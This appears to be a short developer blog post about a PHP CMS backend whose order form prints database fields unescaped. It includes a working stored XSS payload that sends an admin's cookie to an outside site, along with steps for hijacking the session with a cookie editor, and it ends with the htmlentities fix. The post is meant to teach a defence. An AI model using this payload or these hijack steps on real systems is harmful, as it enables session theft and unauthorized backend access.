I've told my teammates 1000 times everything must be escaped, but i still found this terrible php code in their projects. This is un-professional.. sigh...
<input id="name" name="name" value="<?php echo htmlspecialchars($row["name"]) ?> />
<textarea id="address" name="address">
<?php echo $row["address"]?>
</textarea>
Above code is a order form in web CMS backend. $row is read from database , contain name field and address field, they will show the values that frontend entered. It can modify each order info by CMS backend.
Here the note that how to hack into the CMS backend without password.
0. Go to Frontend and enter my info
1. First i enter my name field, let enter my site "http://www.webmoss.net/?".
2. Second i enter my address field, enter "</textarea><script>location.href=document.all.name.value+document.cookie</script>"
3. If some admin login to CMS backend and view my info, his cookie data will send to my site directly, including session id or PHPSESSION. Then I check my www.webmoss.net access log, got the session id and referer link.
4. Install this cookie editor, https://addons.mozilla.org/en-US/firefox/addon/573
copy the session id to cookie editor. Go to the referer link which found in www.webmoss.net access log.
5. Yo, I saw my info in backend. This is terrible.
To fix this hole, just simply use htmlentities like this
<?=htmlentities($row["des"],ENT_QUOTES,"UTF-8")?>
I don't want next 1001 time.
NOT only textarea use htmlentities, every data also have to use htmlentities
here the code
"</body><script>location.href=document.all.name.value+document.cookie</script>"
God Bless
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment